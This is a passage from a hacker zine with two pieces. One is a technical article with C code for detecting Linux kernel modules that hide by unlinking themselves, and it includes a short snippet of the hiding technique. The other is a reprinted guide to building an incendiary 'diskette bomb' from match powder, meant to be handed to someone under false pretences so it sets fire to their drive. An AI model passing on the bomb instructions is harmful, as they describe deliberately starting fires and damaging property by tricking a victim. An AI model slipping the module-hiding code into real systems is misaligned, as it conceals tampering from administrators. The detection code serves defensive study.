- Finding hidden kernel modules (the extrem way) ]=--------------=| |=-----------------------------------------------------------------------=| by madsys 1 Introduction 2 The technique of module hiding 3 Countermeasure -- brute force 4 Problem of unmapped 5 Greetings 6 References 7 Code 1 Introduction ============== This paper presents a method for how to find out the hidden modules in linux system. Generaly speaking, most of the attackers intend to hide their modules after taking down the victim. They like this way to prevent the change of kernel from being detected by the administrator. As modules were linked to a singly linked chain, the original one was unable to be recovered while some modules have been removed. In this sense, to retrieve the hidden modules came up to be hard. Essential C skill and primary knowledge of linux kernel are needed. 2 The technique of module hiding ================================ First of all, the most popular and general technique of module hiding and the quomodo of application to get module's list were examined. An implement of module hiding was shown as below: ----snip---- struct module *p; for (p=&__this_module; p->next; p=p->next) { if (strcmp(p->next->name, str)) continue; p->next=p->next->next; // <-- here it removes that module break; } ----snip---- As you can see, in order to hide one module, the unidirectional chain was modified, and following is a snippet of sys_create_module() system call, which might tell why the technique worked: ----snip---- spin_lock_irqsave(&modlist_lock, flags); mod->next = module_list; module_list = mod; /* link it in */ spin_unlock_irqrestore(&modlist_lock, flags); ----snip---- A conclusion could be made: modules linked to the end of unidirectional chain when they were created. "lsmod" is an application on linux for listing current loaded modules, which uses sys_query_module() system call to get the listing of loaded modules, and qm_modules() is the actual function called by it while querying modules: static int qm_modules(char *buf, size_t bufsize, size_t *ret) { struct module *mod; size_t nmod, space, len; nmod = space = 0; for (mod=module_list; mod != &kernel_module; mod=mod->next, ++nmod) { len = strlen(mod->name)+1; if (len > bufsize) goto calc_space_needed; if (copy_to_user(buf, mod->name, len)) return -EFAULT; buf += len; bufsize -= len; space += len; } if (put_user(nmod, ret)) return -EFAULT; else return 0; calc_space_needed: space += len; while ((mod = mod->next) != &kernel_module) space += strlen(mod->name)+1; if (put_user(space, ret)) return -EFAULT; else return -ENOSPC; } note: pointer module_list is always at the head of the singly linked chain. It clearly showing the technique of hiding module was valid. 3 Countermeasure -- brute force =============================== According to the technique of hiding module, brute force might be useful. sys_creat_module() system call was expressed as below. --snip-- if ((mod = (struct module *)module_map(size)) == NULL) { error = -ENOMEM; goto err1; } --snip-- and the macro module_map in "asm/module.h": #define module_map(x) vmalloc(x) You should have noticed that the function calls vmalloc() to allocate the module struct. So the size limitation of vmalloc zone for brute force is able to be exploited to determine what modules in our system on earth. As you know, the vmalloc zone is 128M(2.2, 2.4 kernel, there are many inanition zones in it), however, any allocated module should be aligned by 4K. Therefor, the theoretical maximum number we were supposed to detect was 128M/4k=32768. 4 Problem of unmapped ===================== By far, maybe you think: umm, it's very easy to use brute force to list those evil modules". But it is not true because of an important reason: it is possible that the address which you are accessing is unmapped, thus it can cause a paging fault and the kernel would report: "Unable to handle kernel paging request at virtual address". So we must make sure the address we are accessing is mapped. The solution is to verify the validity of the corresponding entry in kernel pgd(swapper_pg_dir) and the corresponding entry in page table.Furthermore, we were supposed to make sure the content of address pointed by "name" pointer(in struct module) was valid. Because the 768~1024 entries of user process's pgd were synchronous with kerenl pgd, and that was why such hardcore address of kernel pgd (0xc0101000) was used. following is the function for validating those entries in pgd or pgt: int valid_addr(unsigned long address) { unsigned long page; if (!address) return 0; page = ((unsigned long *)0xc0101000)[address >> 22]; //pde if (page & 1) { page &= PAGE_MASK; address &= 0x003ff000; page = ((unsigned long *) __va(page))[address >> PAGE_SHIFT]; //pte if (page) return 1; } return 0; } After validating those addresses which we would check, the next step would be easy -- just brute force. As the list of modules including hidden modules had been created, you could compare it with the output of "lsmod". Then you can find out those evil modules and get rid of them freely. 5 Greetings =========== Shout to uberhax0rs@linuxforum.net 6 Code ====== -----BEGING MODULE_HUNTER.C----- /* * module_hunter.c: Search for patterns in the kernel address space that * look like module structures. This tools find hidden modules that * unlinked themself from the chained list of loaded modules. * * This tool is currently implemented as a module but can be easily ported * to a userland application (using /dev/kmem). * * Compile with: gcc -c module_hunter.c -I/usr/src/linux/include * insmod ./module_hunter.o * * usage: cat /proc/showmodules && dmesg */ #define MODULE #define __KERNEL__ #include #ifdef CONFIG_SMP #define __SMP__ #endif #ifdef CONFIG_MODVERSIONS #define MODVERSIONS #include #endif #include #include #include #include #include #include #include #include #include #include #include static int errno; int valid_addr(unsigned long address) { unsigned long page; if (!address) return 0; page = ((unsigned long *)0xc0101000)[address >> 22]; if (page & 1) { page &= PAGE_MASK; address &= 0x003ff000; page = ((unsigned long *) __va(page))[address >> PAGE_SHIFT]; //pte if (page) return 1; } return 0; } ssize_t showmodule_read(struct file *unused_file, char *buffer, size_t len, loff_t *off) { struct module *p; printk("address module\n\n"); for (p=(struct module *)VMALLOC_START; p<=(struct \ module*)(VMALLOC_START+VMALLOC_RESERVE-PAGE_SIZE); p=(struct module \ *)((unsigned long)p+PAGE_SIZE)) { if (valid_addr((unsigned long)p+ (unsigned long)&((struct \ module *)NULL)->name) && valid_addr(*(unsigned long *)((unsigned long)p+ \ (unsigned long)&((struct module *)NULL)->name)) && strlen(p->name)) if (*p->name>=0x21 && *p->name<=0x7e && (p->size < 1 <<20)) printk("0x%p%20s size: 0x%x\n", p, p->name, p->size); } return 0; } static struct file_operations showmodules_ops = { read: showmodule_read, }; int init_module(int x) { struct proc_dir_entry *entry; entry = create_proc_entry("showmodules", S_IRUSR, &proc_root); entry->proc_fops = &showmodules_ops; return 0; } void cleanup_module() { remove_proc_entry("showmodules", &proc_root); } MODULE_LICENSE("GPL"); MODULE_AUTHOR("madsysercist.iscas.ac.cn"); -----END MODULE-HUNTER.C----- |=-----------------------------------------------------------------------=| |=-=[ 7 - Good old floppy bombs ]=---------------------------------------=| |=-----------------------------------------------------------------------=| [ Note by the editors: We felt like it's time for a re-print of some already forgotton fun with pyro techniques. Enjoy. ] #################################### # How To Make A Diskette Bomb # # by Phrick-A-Phrack # #################################### Before I even start i want to make it clear that i do NOT take any responsibility on the use of the information in this document. This little baby is good to use to stuff up someones computer a little. It can be adapted to a range of other things. You will need: - A disk (3.5" floppys are a good disk to use) - Scissors - White or blue kitchen matches (i have not found any other colors that work - im not sure why) - Clear nail polish What to do: - Carefully open up the diskette - remove the cotton covering from the inside. - scrape a lot of match powder into a bowl (use a woodent scraper as metal might spark and ignite the match powder) - After you have a lot, spread it EVENLY on the disk. - Spread nail polish over the match powder on the disk. - let it dry. - carefully put the diskette back together and use the nail plish to seal is shut. How to use it: Give it to someone you want to give a fright and stuff up their computer a little. Tell them its got something they are interested in on it. When they put it in their drive the drive head attempts to read the disk which causes a small fire - enough heat to melt the disk drive and stuff the head up! ^^Phrick-A-Phrack^^ |=[ EOF ]=---------------------------------------------------------------=|